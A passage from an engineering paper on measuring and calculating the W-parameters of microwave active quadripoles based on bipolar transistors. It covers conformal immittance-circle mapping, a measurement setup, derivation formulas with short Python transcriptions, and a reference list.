\mathrm{Im}\,W_{22} = \mathrm{Im}\,W_{OUT.B} + \dfrac{\mathrm{Im}(W_{12}W_{21})}{2\,\mathrm{Re}\,W_{11}}.
\end{cases} \tag{7}$$
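For readers who prefer code, a direct transcription of (7) is sketched below. It assumes the circle parameters ρ_IN, ρ'_IN, ρ_OUT, Re W_g and the measured centers W_IN.A, W_IN.B, W_OUT.B are already available from the immittance-circle measurements; the function and variable names are ours, not the paper's.

```python
import math

def nonstandard_w_params(rho_in, rho_in_p, rho_out, re_wg, w_in_a, w_in_b, w_out_b):
    """Transcription of system (7): recover the nonstandard W-parameters
    from the measured immittance-circle parameters."""
    re_w22 = rho_in_p * re_wg / (rho_in - rho_in_p)
    re_w11 = (rho_in / rho_out) * re_w22
    abs_w12w21 = 2.0 * rho_in * re_w22
    re_w12w21 = 2.0 * re_w22 * (re_w11 - w_in_a.real)
    # The imaginary part follows from the magnitude and the real part.
    im_w12w21 = math.sqrt(max(abs_w12w21**2 - re_w12w21**2, 0.0))
    im_w11 = w_in_b.imag + im_w12w21 / (2.0 * re_w22)
    im_w22 = w_out_b.imag + im_w12w21 / (2.0 * re_w11)
    return (complex(re_w11, im_w11),
            complex(re_w22, im_w22),
            complex(re_w12w21, im_w12w21))
```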
3 Experimental Testing of Nonstandard W-parameters of Microwave Active Quadripole on a Bipolar Transistor

The block diagram of the experimental equipment for measuring the microwave quadripole W-parameters is shown in Fig. 4 [22]. The results of calculations and the experimental values obtained using the methodology of [23, 24] are presented in Figs. 5, 6, 7, 8 and 9. As can be seen from the comparison of the theoretical and experimental results in the frequency range 0.1–3 GHz, the discrepancy does not exceed 15%, which confirms the adequacy of the developed methodology [25].
4 Graphic-Analytical Method for Determining Standard Microwave W-parameters of an Active Quadripole

Graphical methods for determining the equivalent microwave parameters of the quadripole from measurement results are more convenient than analytical methods. With a mathematical equation and its graphical interpretation, it is relatively easy to determine the required values, solving the problem by graphic techniques. There are several methods of graphic representation of relations that characterize complete
Fig. 4. Block diagram of the experimental equipment for measuring the nonstandard W-parameters of the active quadripole on a bipolar transistor: MG is a measuring generator; V is a microwave valve (isolator); R is a reflectometer; T is a tee; P is a phase rotator; IQ is the investigated quadripole, fixed in a special holder; P1 and P2 are two short-circuiting pistons [22].
Fig. 5. Frequency dependences of the nonstandard quadripole transistor W-parameter |Y12| (theoretical and experimental data).
complex resistance (conductivity). The following two are the most convenient: 1) the circular impedance diagram in rectangular coordinates [26]; 2) the circular impedance diagram in polar coordinates, first proposed by Smith [27]. One of the ways to improve the effectiveness of measuring the quality
Fig. 6. Frequency dependences of the nonstandard quadripole transistor W-parameter |Y21| (theoretical and experimental data).
Fig. 7. Frequency dependences of the nonstandard quadripole transistor W-parameter Re(Y12 Y21) (theoretical and experimental data).
characteristics of semiconductor devices is to obtain more reliable information about the device by improving the methods and means of measurement [28]. Using the results of the analysis based on the developed algorithm allows us to develop a new, more advanced installation for measuring the standard W-parameters of quadripole semiconductor devices, taking into account their potential instability [22, 23, 29]. The measuring device for determining the characteristics of potentially unstable semiconductor devices should provide [30]: 1) taking multidimensional measurements (in all connection schemes of the investigated quadripole) with minimal losses in the measuring channel and with decoupling of the microwave circuits from the power supply; 2) the stability of the measuring device during the measurement; 3) connection to the measuring channel of
Fig. 8. Frequency dependences of the nonstandard quadripole transistor W-parameter Im(Y12 Y21) (theoretical and experimental data).
Fig. 9. Frequency dependences of the nonstandard quadripole transistor W-parameter |Y12 Y21| (theoretical and experimental data).
three- and four-pin devices, as the most common in microwave electronics; 4) conducting measurements in the required frequency range; 5) measurement of parameters with the accuracy and productivity needed to apply the installation in laboratory conditions. The system of Y-parameters of the conductivity matrix of the active quadripole is selected in this work as the most convenient and widely used for the calculation of electronic circuits described by the matrix of the equivalent quadripole. We combine the graphical representation of the immittance with its analytical expressions and, on this basis, develop a method for determining the standard W-parameters of the quadripole. To do this we use the method of conformal mappings of a function of a complex variable [27, 28]. Let us represent the expressions for the input and output
immittances of the quadripole in the generalized W-parameters (Fig. 10):

$$W_{input} = W_{11} - \frac{W_{12} W_{21}}{W_{22} + W_{load}}, \qquad W_{output} = W_{22} - \frac{W_{12} W_{21}}{W_{11} + W_{g}}, \tag{8}$$

where $W_{11}$, $W_{22}$, $W_{12}$, $W_{21}$ are the generalized parameters of the quadripole matrix; $W_{input}$, $W_{output}$ are the input and output immittances of the quadripole; $W_{load}$, $W_g$ are the immittances of the load and the generator (Fig. 10). Let us convert the expressions for the input and output immittances (8) to the form

$$W_{input} = \frac{c\,W_{load} + b}{W_{load} + a}, \qquad W_{output} = \frac{a\,W_{g} + b}{W_{g} + c}, \tag{9}$$

where $a = W_{22}$, $b = W_{22} W_{11} - W_{12} W_{21}$, $c = W_{11}$.
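A small self-check of the algebra in (8)–(9): both forms must give the same immittance for any load. The W-parameter values in the sketch below are arbitrary placeholders, used only to exercise the two expressions.

```python
def w_input(w11, w12, w21, w22, w_load):
    """Input immittance of the loaded quadripole, Eq. (8)."""
    return w11 - w12 * w21 / (w22 + w_load)

def w_input_fractional_linear(w11, w12, w21, w22, w_load):
    """The same immittance in the fractional-linear form of Eq. (9)."""
    a, b, c = w22, w22 * w11 - w12 * w21, w11
    return (c * w_load + b) / (w_load + a)

# Arbitrary placeholder parameters: the two forms agree to rounding error.
p = (2 + 1j, 0.5 - 0.2j, 3 + 0.4j, 1.5 + 0.7j)
assert abs(w_input(*p, 1 + 2j) - w_input_fractional_linear(*p, 1 + 2j)) < 1e-12
```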
Fig. 10. Active quadripole with connected loads.
In accordance with the theory of conformal mappings [27, 28], the straight line $\mathrm{Re}\,W_g(W_{load}) = 0$ is mapped onto the plane $W_{output}$ ($W_{input}$) as the circle $|W_{output} - W_{output0}| = \rho_{output}$ ($|W_{input} - W_{input0}| = \rho_{input}$), with center $W_{output0}$ ($W_{input0}$) and radius $\rho_{output}$ ($\rho_{input}$). In this case

$$W_{output0} = W_{22} - \frac{W_{12} W_{21}}{2\,\mathrm{Re}\,W_{11}}, \qquad W_{input0} = W_{11} - \frac{W_{12} W_{21}}{2\,\mathrm{Re}\,W_{22}}, \tag{10}$$

$$\rho_{output} = \frac{|W_{12} W_{21}|}{2\,\mathrm{Re}\,W_{11}}, \qquad \rho_{input} = \frac{|W_{12} W_{21}|}{2\,\mathrm{Re}\,W_{22}}. \tag{11}$$
As follows from (10) and (11), $W_{output}$ ($W_{input}$) can be considered a fractional-linear function that maps the complex plane $W_g$ onto the plane $W_{output}$ and the complex plane $W_{load}$ onto the plane $W_{input}$. The admissible values of the generator immittance $W_g$ correspond to the half-plane $\mathrm{Re}\,W_g \geq 0$, and the values of the load $W_{load}$ correspond to the half-plane $\mathrm{Re}\,W_{load} \geq 0$ (Fig. 11).
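Expressions (10)–(11) translate directly into code; the sketch below computes the center and radius of the input immittance circle (the parameter values are again placeholders, not measured data).

```python
def input_circle(w11, w12, w21, w22):
    """Center and radius of the input immittance circle, Eqs. (10)-(11):
    the image of the line Re W_load = 0 on the W_input plane."""
    center = w11 - (w12 * w21) / (2.0 * w22.real)
    radius = abs(w12 * w21) / (2.0 * w22.real)
    return center, radius

center, radius = input_circle(2 + 1j, 0.5 - 0.2j, 3 + 0.4j, 1.5 + 0.7j)
print(center, radius)
```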
Fig. 11. Half-plane of the immittance $W_g(W_{load}) = \mathrm{Re}\,W_g(W_{load}) + j\,\mathrm{Im}\,W_g(W_{load})$.
Fig. 12. Conformal mapping of immittances Wg (Wload ).
At $\mathrm{Re}\,W_g > 0$ the whole right half-plane $W_g$ is mapped inside the circle on the plane $W_{output}$, and at $\mathrm{Re}\,W_{load} > 0$ the whole right half-plane $W_{load}$ is mapped inside the circle on the plane $W_{input}$ (Fig. 12). The dependences of the quadripole input immittance $W_{input}$ (output $W_{output}$) on the reactive component of the immittance of the load $W_{load}$ (generator $W_g$) are given in Fig. 13. In Fig. 13 the circle with radius $\rho'_{input}$ represents the locus of the input immittance values at a fixed active component of the load $\mathrm{Re}\,W_{load} > 0$. For this graphical interpretation of the input and output immittances we can write the system of
Fig. 13. Dependence of the quadripole input immittance Winput (output Woutput ) on the reactive component of the immittance of the load Wload (generator Wg ).
analytic expressions:

$$\begin{cases}
\rho_{input} = \dfrac{|W_{12} W_{21}|}{2\,\mathrm{Re}\,W_{22}},\\[2mm]
\rho'_{input} = \dfrac{|W_{12} W_{21}|}{2\,\mathrm{Re}(W_{22} + W_{load})},\\[2mm]
\rho_{output} = \dfrac{|W_{12} W_{21}|}{2\,\mathrm{Re}\,W_{11}},\\[2mm]
\mathrm{Re}\,W_{input0} = \mathrm{Re}\,W_{11} - \dfrac{\mathrm{Re}(W_{12} W_{21})}{2\,\mathrm{Re}\,W_{22}},\\[2mm]
\mathrm{Im}\,W_{input0} = \mathrm{Im}\,W_{11} - \dfrac{\mathrm{Im}(W_{12} W_{21})}{2\,\mathrm{Re}\,W_{22}},\\[2mm]
\mathrm{Re}\,W_{output0} = \mathrm{Re}\,W_{22} - \dfrac{\mathrm{Re}(W_{12} W_{21})}{2\,\mathrm{Re}\,W_{11}},\\[2mm]
\mathrm{Im}\,W_{output0} = \mathrm{Im}\,W_{22} - \dfrac{\mathrm{Im}(W_{12} W_{21})}{2\,\mathrm{Re}\,W_{11}},
\end{cases} \tag{12}$$

where $\mathrm{Re}\,W_{load}$ is the active component of the load immittance, and $W_{11}$, $W_{12}$, $W_{21}$, $W_{22}$ are the required parameters of the equivalent quadripole matrix. Having solved the system (12), we find the parameters $W_{11}$ and $W_{22}$, which correspond geometrically to the intersection points of the immittance circles at the input
(for different values of $\mathrm{Re}\,W_{load}$) and at the output (for different values of $\mathrm{Re}\,W_g$):

$$\mathrm{Re}\,W_{22} = \frac{\rho'_{input}\,\mathrm{Re}\,W_{load}}{\rho_{input} - \rho'_{input}}, \qquad \mathrm{Im}\,W_{22} = \mathrm{Im}\,W_{output0} + \sqrt{\rho_{output}^2 - \mathrm{Re}^2\big(W_{22} - W_{output0}\big)}, \tag{13}$$

$$\mathrm{Re}\,W_{11} = \frac{\rho_{input}}{\rho_{output}}\,\mathrm{Re}\,W_{22}, \qquad \mathrm{Im}\,W_{11} = \mathrm{Im}\,W_{input0} + \sqrt{\rho_{input}^2 - \mathrm{Re}^2\big(W_{11} - W_{input0}\big)}. \tag{14}$$
Considering the solution of system (12), we can conclude that in order to determine the $W_{11}$ and $W_{22}$ parameters of the equivalent quadripole it is sufficient to determine the parameters $W_{input0}$, $W_{output0}$, $\rho_{input}$, $\rho_{output}$ and $\rho'_{input}$ of the immittance circles [23, 29].
5 Experimental Research of Standard Microwave W-parameters of Active Quadripole Based on the Bipolar Transistor

The measuring complex that implements the method for determining the Y-parameters (Y11, Y12, Y21, Y22) has the block diagram shown in Fig. 14. The unconventional elements of the measuring installation include the adjustable immittance Y (or impedance Z). For conductivity ReY = 0, a regulated short-circuit piston is used as the conductivity Y; when the conductivity Y is changed (ReY > 0), a known active conductivity ReY = ReYload is connected in parallel to the piston input. The adjustable complex resistance Z is realized in the form of a device [31] consisting of a bipolar transistor whose emitter is connected to the first terminal of the bias source and whose collector is connected to the second terminal of the bias source, together with a resistance connected between the second terminal of the bias source and a strip band-stop filter connected to the base of the transistor (Fig. 15). This impedance device imitates regulated active and reactive impedances and, due to the inclusion of the strip band-stop filter, provides a negative value of the active component of the impedance, which extends the frequency range of the device [31]. The adjustable complex resistance Z, implemented as the impedance device (Fig. 15), is required to create operating modes of the quadripole in which power transmission in the forward or reverse direction is absent. The process of measuring the complete conductivity matrix Y of the quadripole consists of two stages: first the own parameters (Y11 and Y22) are measured, and then the mutual parameters (Y12 and Y21). At the first stage, the immittance meter (MFC) is connected through the switch K4 to the investigated quadripole Y. Through the switch K2, the generator of electromagnetic oscillations G, which forms a signal of the required frequency, is connected to the output of the investigated quadripole Y, and the adjustable complex resistance Z is set to zero.
Fig. 14. Block diagram of the measuring complex for the Y-parameters of the conductivity matrix of the microwave quadripole with consideration of its potential instability: immittance meter (MFC); the holder of the investigated quadripole (Y), which provides its connection to the measuring channel and decoupling of the microwave circuits from the power supply; generator of electromagnetic oscillations (G); four switches (K1, K2, K3, K4); adjustable immittance (Y) (or impedance (Z)) required for obtaining different operating modes of the investigated quadripole; power supply unit (PSU), which sets the required direct-current operating mode; power meter (PM) [31]. The complex transmission coefficient measuring device P4-11 is used, which allows measuring the quadripole parameters at frequencies 0.001…1.25 GHz; for higher frequencies other types of meters must be used. The power meter is a device of type M4-2. Switches K1…K4 are used to connect the measuring devices and the adjustable immittance to the input and output of the investigated quadripole. To automatically determine the readings of the pointer measuring devices used, the method considered in [32] was applied.
With a real component of conductivity ReYload = 0, the geometric locus of points of the input conductivity Yinput will be the boundary circle on the complex plane of the dependence of Yinput on the reactive component of the conductivity ImYload (Fig. 13). Given that on the immittance circles of the loci of the input and output conductivities of the quadripole there are always points lying in the right half-plane of the complex plane, excitation of the investigated active quadripole during the measurement process can be excluded. By changing the length of the short-circuit piston (ReYload = 0), we achieve
Fig. 15. Schematic of the impedance device simulating reactive and active impedances: 1 – transistor; 2 – source of bias voltage; 3 – resistance; 4 – strip band-stop filter.
stable immittance meter (MFC) readings and measure three values of the input conductivity of the quadripole, Yinput1, Yinput2 and Yinput3, which lie in the right half-plane of the complex plane. Then

$$\mathrm{Re}\,Y_{input0} = \frac{\mathrm{Re}^2 Y_{input2} - \mathrm{Re}^2 Y_{input1} + \mathrm{Im}^2 Y_{input2} - \mathrm{Im}^2 Y_{input1} - 2\,\mathrm{Im}\,Y_{input0}\big(\mathrm{Im}\,Y_{input2} - \mathrm{Im}\,Y_{input1}\big)}{2\big(\mathrm{Re}\,Y_{input2} - \mathrm{Re}\,Y_{input1}\big)}, \tag{15}$$

$$\mathrm{Im}\,Y_{input0} = \frac{\big(\mathrm{Re}^2 Y_{input2} - \mathrm{Re}^2 Y_{input1} + \mathrm{Im}^2 Y_{input2} - \mathrm{Im}^2 Y_{input1}\big)\big(\mathrm{Re}\,Y_{input2} - \mathrm{Re}\,Y_{input3}\big) - \big(\mathrm{Re}^2 Y_{input2} - \mathrm{Re}^2 Y_{input3} + \mathrm{Im}^2 Y_{input2} - \mathrm{Im}^2 Y_{input3}\big)\big(\mathrm{Re}\,Y_{input2} - \mathrm{Re}\,Y_{input1}\big)}{2\big[\big(\mathrm{Im}\,Y_{input3} - \mathrm{Im}\,Y_{input2}\big)\big(\mathrm{Re}\,Y_{input2} - \mathrm{Re}\,Y_{input1}\big) - \big(\mathrm{Im}\,Y_{input1} - \mathrm{Im}\,Y_{input2}\big)\big(\mathrm{Re}\,Y_{input2} - \mathrm{Re}\,Y_{input3}\big)\big]}, \tag{16}$$

$$\rho_{input} = \sqrt{\big(\mathrm{Re}\,Y_{input1} - \mathrm{Re}\,Y_{input0}\big)^2 + \big(\mathrm{Im}\,Y_{input1} - \mathrm{Im}\,Y_{input0}\big)^2}. \tag{17}$$
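Equations (15)–(17) are the classical "circle through three points" construction. An equivalent, more compact computation of the same center and radius from the three measured admittances is sketched below; the three sample readings are placeholders, not measured data.

```python
def circle_through_points(y1: complex, y2: complex, y3: complex):
    """Center and radius of the circle through three measured admittances,
    equivalent to Eqs. (15)-(17) written in complex form."""
    # Subtracting |y - c|^2 = r^2 pairwise gives a linear 2x2 system in Re c, Im c.
    ax, ay = y2.real - y1.real, y2.imag - y1.imag
    bx, by = y2.real - y3.real, y2.imag - y3.imag
    da = (abs(y2)**2 - abs(y1)**2) / 2.0
    db = (abs(y2)**2 - abs(y3)**2) / 2.0
    det = ax * by - ay * bx          # zero if the three points are collinear
    cx = (da * by - db * ay) / det
    cy = (ax * db - bx * da) / det
    center = complex(cx, cy)
    return center, abs(y1 - center)

# Placeholder readings: all three points lie at distance ~1.581 from (2.5, 1.5).
center, radius = circle_through_points(1 + 1j, 2 + 3j, 4 + 2j)
print(center, radius)
```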
Next, we need to find the radius $\rho'_{input}$ of an immittance circle at a value of the active component of the load conductivity ReY = ReYload > 0. To do this, the known active conductivity ReY = ReYload is connected in parallel to the piston input of the regulated complex load Y. Repeating the measurement of three input conductivity values $Y'_{input1}$, $Y'_{input2}$ and $Y'_{input3}$ at the set value of ReYload, we define $\rho'_{input}$:

$$\rho'_{input} = \sqrt{\big(\mathrm{Re}\,Y'_{input1} - \mathrm{Re}\,Y'_{input0}\big)^2 + \big(\mathrm{Im}\,Y'_{input1} - \mathrm{Im}\,Y'_{input0}\big)^2}. \tag{18}$$
The next step is to find the immittance parameters of the active quadripole at the output. To do this, the adjustable complex conductivity Y is connected through the switch K3 to the input of the quadripole holder, while the parallel-connected active load ReYload is removed from the short-circuit piston, so that ReY = 0; the conductivity of the short-circuit piston then has only a reactive component. The immittance meter (MFC) is connected through the switch K2 to the output of the investigated quadripole. Using switch K1, the generator G is connected to the input of the investigated quadripole Y. By changing the length of the short-circuit piston of the regulated complex conductivity Y, i.e., by changing the imaginary component of the conductivity ImY, we obtain a stable indication of the immittance meter, which guarantees the stability of the measuring device. Then we measure three values
of the output conductivity of the active quadripole, Youtput1, Youtput2 and Youtput3, from which, by the above method, we determine the parameters of the output immittance circle of the investigated active quadripole (Fig. 13):

$$\mathrm{Im}\,Y_{output0} = \frac{\big(\mathrm{Re}^2 Y_{output2} - \mathrm{Re}^2 Y_{output1} + \mathrm{Im}^2 Y_{output2} - \mathrm{Im}^2 Y_{output1}\big)\big(\mathrm{Re}\,Y_{output2} - \mathrm{Re}\,Y_{output3}\big) - \big(\mathrm{Re}^2 Y_{output2} - \mathrm{Re}^2 Y_{output3} + \mathrm{Im}^2 Y_{output2} - \mathrm{Im}^2 Y_{output3}\big)\big(\mathrm{Re}\,Y_{output2} - \mathrm{Re}\,Y_{output1}\big)}{2\big[\big(\mathrm{Im}\,Y_{output3} - \mathrm{Im}\,Y_{output2}\big)\big(\mathrm{Re}\,Y_{output2} - \mathrm{Re}\,Y_{output1}\big) - \big(\mathrm{Im}\,Y_{output1} - \mathrm{Im}\,Y_{output2}\big)\big(\mathrm{Re}\,Y_{output2} - \mathrm{Re}\,Y_{output3}\big)\big]}, \tag{19}$$

$$\mathrm{Re}\,Y_{output0} = \frac{\mathrm{Re}^2 Y_{output2} - \mathrm{Re}^2 Y_{output1} + \mathrm{Im}^2 Y_{output2} - \mathrm{Im}^2 Y_{output1} - 2\,\mathrm{Im}\,Y_{output0}\big(\mathrm{Im}\,Y_{output2} - \mathrm{Im}\,Y_{output1}\big)}{2\big(\mathrm{Re}\,Y_{output2} - \mathrm{Re}\,Y_{output1}\big)}, \tag{20}$$

$$\rho_{output} = \sqrt{\big(\mathrm{Re}\,Y_{output1} - \mathrm{Re}\,Y_{output0}\big)^2 + \big(\mathrm{Im}\,Y_{output1} - \mathrm{Im}\,Y_{output0}\big)^2}. \tag{21}$$
As a result of the measurements and calculations, we have obtained the parameters of the two immittance circles at the input of the investigated active quadripole (ImYinput0, ReYinput0, ρinput and ρ'input) and of the immittance circle at the output (ReYoutput0, ImYoutput0 and ρoutput); the active part of the load ReYload is also set. These results are sufficient for finding the parameters Y11 and Y22:
$$\mathrm{Re}\,Y_{22} = \frac{\rho'_{input}\,\mathrm{Re}\,Y_{load}}{\rho_{input} - \rho'_{input}}, \tag{22}$$

$$\mathrm{Im}\,Y_{22} = \mathrm{Im}\,Y_{output0} + \frac{\sqrt{\rho_{input}^2 - \mathrm{Re}^2\big(Y_{11} - Y_{input0}\big)}\cdot\rho_{output}}{\rho_{input}}. \tag{23}$$
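Formulas (22)–(23) again translate directly into code. The sketch below follows the reading of (23) adopted above; all numeric inputs are placeholders obtained in the earlier measurement steps, and the function name is ours.

```python
import math

def y22_from_circles(re_yload, rho_in, rho_in_p, rho_out, y11, y_input0, y_output0):
    """Y22 of the investigated quadripole from the measured immittance
    circles, Eqs. (22)-(23)."""
    re_y22 = rho_in_p * re_yload / (rho_in - rho_in_p)
    im_y22 = y_output0.imag + (
        math.sqrt(rho_in**2 - (y11 - y_input0).real**2) * rho_out / rho_in
    )
    return complex(re_y22, im_y22)
```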
At the second stage, we determine the mutual parameters Y12 and Y21 [30]. To determine these parameters we need to measure the input and output conductivities of the investigated quadripole with the complex regulated resistance [31] connected to its common bus and chosen so that there is no power transmission in the formed quadripole (Y12 = 0 and Y21 = 0). In addition, it is necessary to determine the maximum power transmission coefficient KmS. The measurements are performed as follows. The signal from the generator G (Fig. 14) is fed to the input of the quadripole Y. The power meter is connected through the switch K2 to the quadripole output, switches K3 and K4 are in the open position, and the resistance Z is in the zero position. The power P1 at the quadripole output is measured; then the switches K1 and K2 exchange the places of the generator G and the power meter PM, and we measure the power P2 at the input of the investigated quadripole. According to the known formula [33], we find the maximum power transmission coefficient

$$K_{mS} = \frac{P_1}{P_2}. \tag{24}$$

Then we return the measuring devices to their starting positions and, by changing the value of the complex resistance Z to a certain value, we obtain a zero indication of the
power meter, which indicates fulfillment of the condition Y21 = 0. In this mode, instead of the power meter, we connect the immittance meter (MFC) through the switch K2 and measure the output conductivity Youtput of the formed quadripole. Then we connect the generator G through the switch K2 to the output of the quadripole Y, whose input is connected through the switch K1 to the power meter PM. Changing the value of the complex resistance Z, we obtain zero readings of the power meter PM, which indicates fulfillment of the condition Y12 = 0. Instead of the power meter, through the switch K1, we connect the immittance meter (MFC) to the quadripole input and, in the steady state of zero power transmission, measure the input conductivity Yinput. On the basis of the obtained results we calculate Y12 and Y21 [23, 31]:

$$Y_{12} = \frac{Y_{output} Y_{11} - Y_{input} Y_{22}}{Y_{input} K_{mS} - Y_{output}}, \qquad Y_{21} = \frac{Y_{output} Y_{11} - Y_{input} Y_{22}}{Y_{input} - Y_{output}/K_{mS}}, \tag{26}$$

where KmS is the maximum power transfer coefficient; Y11 and Y22 are the parameters of the conductivity matrix of the investigated quadripole; Yinput and Youtput are the input and output conductivities of the formed quadripole (through the complex resistance Z) in the zero-transfer-power modes. Summing up, during the measuring process there is no need to short-circuit the input and output terminals of the quadripole (in particular, the transistor), which ensures the stability of the measuring installation over a wide frequency range. In contrast to measurement of the scattering matrix S-parameters, there is no need to perform phase measurements of the signal passing through the quadripole [34], which simplifies the measurement process and reduces the error resulting from the mismatch of the input and output conductivities with the conductivity of the measuring channel [35–37].
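The closing step, Eq. (26), is a pair of closed-form expressions; a direct transcription is sketched below (the inputs are the quantities measured in the two zero-transmission modes, and the function name is ours).

```python
def mutual_parameters(y11, y22, y_input, y_output, k_ms):
    """Mutual parameters Y12 and Y21 from Eq. (26), given the conductivities
    measured in the zero-transfer modes and K_mS = P1/P2 from Eq. (24)."""
    num = y_output * y11 - y_input * y22
    y12 = num / (y_input * k_ms - y_output)
    y21 = num / (y_input - y_output / k_ms)
    return y12, y21
```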
6 Conclusion

The paper presents a developed methodology for determining the standard and nonstandard W-parameters of potentially unstable quadripoles. Using this methodology, a mathematical model of the W-parameters of bipolar transistors has been developed. In particular:
– the choice of equivalent circuits of bipolar transistors in the microwave range is substantiated;
– expressions are obtained that establish the relationship between the physical parameters of the equivalent circuit of the bipolar transistor and the W-parameters of the bipolar transistor as a potentially unstable quadripole;
– a method of numerical experiment for W-parameter determination is developed;
– numerical calculation of nonstandard Y-parameters of bipolar transistors and a comparative analysis of theoretical and experimental studies have been performed, which shows the adequacy of the developed methodology (the difference does not exceed 10%).
The new method of measuring the W-parameters of the quadripole is suitable for both low and ultrahigh frequencies. The standard W-parameters characterizing the instrument under investigation as an equivalent quadripole cannot be determined in
the microwave range by direct measurements. Therefore, mathematical expressions are obtained that establish the relationship between them and the active quadripole parameters. For implementation of the method, a new measuring complex was developed in which, in addition to standard components, non-standard elements were included that make it possible to simulate active and reactive impedances. Equations for determining the methodological error of this method, which does not exceed 5%, are also proposed.
References

1. Di Paolo Emilio, M.: Bipolar transistor. In: Microelectronics, pp. 19–34. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-22545-6_2
2. Makarov, N.S., Ludwig, R., Bitar, S.J.: Bipolar junction transistor and BJT circuits. In: Practical Electrical Engineering, pp. 851–918. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-21173-2_17
3. Grebennikov, A., Kumar, N., Yarman, B.S.: Broadband RF and Microwave Amplifiers. CRC Press, Boca Raton (2017). https://doi.org/10.1201/b19053
4. Grebennikov, A., Sokal, N.O., Franco, M.J.: Computer-aided design of switchmode power amplifiers. In: Switchmode RF and Microwave Power Amplifiers, pp. 607–668 (2012). https://doi.org/10.1016/b978-0-12-415907-5.00012-2
5. Pridham, G.J.: Solid-State Circuits. In: Hiller, N. (ed.) The Commonwealth and International Library, Electrical Engineering Division. Pergamon, Elsevier (2013)
6. Eroglu, A.: Linear and Switch-Mode RF Power Amplifiers. CRC Press, Boca Raton (2017). https://doi.org/10.1201/9781315151960
7. Grebennikov, A.: RF and Microwave Transmitter Design. CRC Press, Boca Raton (2011). https://doi.org/10.1002/9780470929308
8. Grebennikov, A.: RF and Microwave Power Amplifier Design. McGraw-Hill, New York (2015)
9. Reisch, M.: Physics and modeling of heterojunction bipolar transistors. In: High-Frequency Bipolar Transistors. Springer Series in Advanced Microelectronics, vol. 11, pp. 395–410. Springer, Berlin, Heidelberg (2003). https://doi.org/10.1007/978-3-642-55900-6_4
10. Papadopoulos, C.: Solid-State Electronic Devices. In: Undergraduate Lecture Notes in Physics. Springer, New York (2014). https://doi.org/10.1007/978-1-4614-8836-1
11. Rieger, M., Hieber, W.: Transistor modeling based on small signal S- and Y-parameters. In: Groll, H., Waidelich, W. (eds.) Microwave Applications, pp. 59–64. Springer, Berlin, Heidelberg (1987). https://doi.org/10.1007/978-3-642-83157-7_6
12. Pridham, G.J.: Electronic devices and circuits. In: The Commonwealth and International Library: Electrical Engineering Division, vol. 3. Elsevier (1972). https://doi.org/10.1016/c2013-0-02454-1
13. Grebennikov, A.: RF and Microwave Transistor Oscillator Design. John Wiley & Sons, New York (2007). https://doi.org/10.1002/9780470512098
14. Pritchard, R.L.: Transistor equivalent circuits. Proc. IEEE 86(1), 150–162 (1998). https://doi.org/10.1109/5.658766
15. Filinyuk, N.A.: Use of the stray reactances of transistor leads and case for the construction of resonance microwave switches. Radio Eng. Electron. Phys. 21(5), 160–162 (1976)
16. Filinyuk, N.A., Gavrilov, D.V.: Parameters determination of physical equivalent circuit of Schottky dual-gate MESFET. Izvestiya Vysshikh Uchebnykh Zavedenij. Radioelektronika 47(11), 71–75 (2004)
17. Rieh, J.-S., et al.: X- and Ku-band amplifiers based on Si/SiGe HBT's and micromachined lumped components. IEEE Trans. Microw. Theory Tech. 46(5), 685–694 (1998). https://doi.org/10.1109/22.668683
18. Balashkov, M.V., Bogachev, V.M., Solomatin, D.A.: Simplification of transistor models for the design of information-communication systems. In: 2017 Systems of Signal Synchronization, Generating and Processing in Telecommunications (SINKHROINFO), Kazan, Russia, pp. 1–4 (2017). https://doi.org/10.1109/SINKHROINFO.2017.7997499
19. Bogachev, V.M., Volkov, V.M., Lysenko, V.G., Musyankov, M.I.: Calculating the parameters of high-power high-frequency transistors. Radio Eng. Electron. Phys. 20(3), 97–105 (1975)
20. Haase, M., Hoffmann, K., Hudec, P.: General method for characterization of power-line EMI/RFI filters based on S-parameter evaluation. IEEE Trans. Electromagn. Compat. 58(5), 1465–1474 (2016). https://doi.org/10.1109/TEMC.2016.2583221
21. Bogachev, V.M., Smol'skii, S.M.: The stability of oscillations and transients in high-frequency transistor oscillators having inertial self-bias. Radiophys. Quantum Electron. 17(2), 172–179 (1974). https://doi.org/10.1007/BF01037406
22. Semenov, A.O., Voznyak, O.M., Osadchuk, O.V., et al.: Development of a non-standard system of microwave quadripoles parameters. Proc. SPIE 11176, 111765N (2019). https://doi.org/10.1117/12.2536704
23. Semenov, A.A., Voznyak, O.M., Vydmysh, A.A., et al.: Differential method for measuring the maximum achievable transmission coefficient of active microwave quadripole. J. Phys. Conf. Ser. 1210, 012125 (2019). https://doi.org/10.1088/1742-6596/1210/1/012125
24. Semenov, A.: Mathematical model of the microelectronic oscillator based on the BJT-MOSFET structure with negative differential resistance. In: 2017 IEEE 37th International Conference on Electronics and Nanotechnology (ELNANO), Kiev, pp. 146–151 (2017). https://doi.org/10.1109/ELNANO.2017.7939736
25. Semenov, A., Baraban, S., Semenova, O., et al.: Statistical express control of the peak values of the differential-thermal analysis of solid materials. Solid State Phenom. 291, 28–41 (2019). https://doi.org/10.4028/www.scientific.net/ssp.291.28
26. Evseev, V.I., Lupanova, E.A., Nikulin, S.M., Petrov, V.V.: Contact device with tunable strip matching circuits for measuring parameters of microwave transistors. In: 2019 PhotonIcs & Electromagnetics Research Symposium – Spring (PIERS-Spring), Rome, Italy, pp. 2752–2755 (2019). https://doi.org/10.1109/PIERS-Spring46901.2019.9017801
27. Smith, P.H.: Electronic Applications of the Smith Chart. SciTech Publishing (1995). https://doi.org/10.1049/sbew003e
28. Wilson, C., Zhu, A., Cai, J., King, J.B.: Pade-approximation based behavioral modeling for RF power amplifier design. IEEE Access 9, 18904–18914 (2021). https://doi.org/10.1109/ACCESS.2021.3052687
29. Qin, M., Sun, Y., Li, X., Shi, Y.: Analytical parameter extraction for small-signal equivalent circuit of 3D FinFET into sub-THz range. IEEE Access 6, 19752–19761 (2018). https://doi.org/10.1109/ACCESS.2018.2822672
30. Chen, F.-J., Cheng, X., Zhang, L., et al.: Synthesis and design of lumped-element filters in GaAs technology based on frequency-dependent coupling matrices. IEEE Trans. Microw. Theory Tech. 67(4), 1483–1495 (2019). https://doi.org/10.1109/TMTT.2019.2898857
31. Filinyuk, M.A., Wozniak, O.M., Kurzanov, Y.I., Ogorodnik, O.V.: Impedance device. Ukraine Patent 18059 (1997)
32. Kucheruk, V., Kurytnik, I., Kulakov, P.: Definition of dynamic characteristics of pointer measuring devices on the basis of automatic indications determination. Arch. Control Sci. 28(3), 401–418 (2018). https://doi.org/10.24425/acs.2018.124709
